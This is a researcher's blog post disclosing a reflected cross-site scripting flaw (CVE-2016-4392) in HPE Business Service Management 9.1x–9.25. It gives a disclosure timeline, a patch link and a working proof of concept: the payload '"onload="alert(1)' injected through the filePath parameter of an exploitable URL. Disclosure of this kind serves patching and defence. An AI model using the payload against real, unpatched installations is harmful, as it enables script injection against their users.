HPE Business Service Management (BSM) – Reflected XSS (CVE-2016-4392)

Posted on 25 October 2016 Updated on 25 October 2016

Product & Service Introduction;

HP Business Service Management (BSM) is an end-to-end management solution that integrates network, server, application and business transaction monitoring. HP Business Service Management is developed and marketed by the HP Software Division.

Release Date;

21 Oct 2016

Affected Product;

HP Business Service Management Software 9.1x, 9.20 - 9.25IP1

Abstract Advisory Information;

Ugur Cihan Koc discovered a Reflected XSS vulnerability in HPE BSM

Vulnerability Disclosure Timeline;

27 Nov 2015     Bug reported to the vendor.
03 Dec 2015     Asked about the case.
21 Oct 2016     Fixed
25 Oct 2016     Discloused

Exploitation Technique;

Remote, Authenticated

TECHNICAL DETAILS Payloads;

"onload="alert(1)

Affected Parameter;

filePath

Exploitable URL;

http://[IP]/jsps/cheatsheets/openVideo.jsp?filePath=/%22onload=%22alert%281%29

Solution Fix & Patch;

https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-c05316329

POC Video;

https://drive.google.com/open?id=0B-LWHbwdK3P9enAzbGVHUlFCa3c

Credits & Authors;

Ugur Cihan Koc
@_uceka_
http://www.uceka.com

This entry was posted in Disclosure.

	Paige Wilkins on 8 Adımda Wireless Hack (W…
	Besim Altınok ile Ka… on Wireless Penetration Testing C…
	Wireless Penetration… on Wireless Penetration Testing C…
	Hakan Harbelioğlu on Android – Bankacılık Zar…
	osman on Wireless Penetration Testing C…

uceka

Hack the World

HPE Business Service Management (BSM) – Reflected XSS (CVE-2016-4392)

Leave a comment Cancel reply

HPE Business Service Management (BSM) – Reflected XSS (CVE-2016-4392)

Share

Related

Leave a comment Cancel reply